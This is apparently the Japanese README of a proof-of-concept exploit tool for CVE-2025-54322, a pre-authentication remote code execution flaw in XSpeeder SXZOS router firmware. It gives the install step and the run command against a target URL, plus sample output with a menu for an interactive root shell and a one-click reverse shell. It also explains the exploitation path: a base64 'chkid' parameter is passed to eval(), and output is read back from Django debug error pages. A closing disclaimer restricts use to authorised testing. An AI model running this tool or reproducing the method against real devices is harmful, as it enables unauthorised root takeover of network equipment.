
概念実証エクスプロイト for CVE-2025-54322、XSpeeder SXZOSファームウェアにおける重大な事前認証RCE。インタラクティブシェル、リバースシェルペイロード、および認可されたセキュリティテスト向けの自動セッション初期化を提供します。
CVE-2025-54322 のプロフェッショナルな Proof-of-Concept (PoC) エクスプロイトです。これは、XSpeeder SXZOS ファームウェアにおける重大な事前認証リモートコード実行脆弱性です。この脆弱性は、pwn.ai の自律型AIエージェントによって発見・公開されました。
| - CVE ID: CVE-2025-54322
| - CVSS Score: 10.0 (重大)
| - 影響を受けるベンダー: XSpeeder
| - 影響を受ける製品: SXZOS Firmware (SD-WAN / Edge Routers)
| - 脆弱性の種類: ユーザー入力に対する安全でない eval()
| - 必要な権限: なし (事前認証)
| - 影響: root 権限でのシステム全体の侵害
cd サポート)を備えた疑似シェル環境。/webInfos/ セッション初期化を自動的に処理。requests ライブラリpip install requests
ターゲットURLに対してエクスプロイトを実行します:
python3 cve-2025-54322-exploit.py https://<target-ip>:<port>
[*] Connecting to: https://1.2.3.4:4433
[*] Initializing environment...
[+] Target confirmed: root@sxzros
==================================================
CVE-2025-54322 Exploit Tool
==================================================
1. Enter Interactive CMD Shell
2. One-Click Reverse Shell
3. Exit
==================================================
この脆弱性は、vLogin.py コンポーネントにおける Python の eval() 関数の安全でない使用に起因します。サーバーは base64 エンコードされたパラメータ chkid をデコードし、それを直接 eval() に渡します。
本エクスプロイトは、これらのデバイスの多くで Django の DEBUG モードが有効になっていることを利用し、結果のエラーページに表示されるローカル変数からコマンド出力をキャプチャできるようにしています。
このツールは教育および許可されたセキュリティテスト目的のみに使用されます。作者はこのツールの誤用や損害について責任を負いません。コンピュータシステムへの不正アクセスは違法です。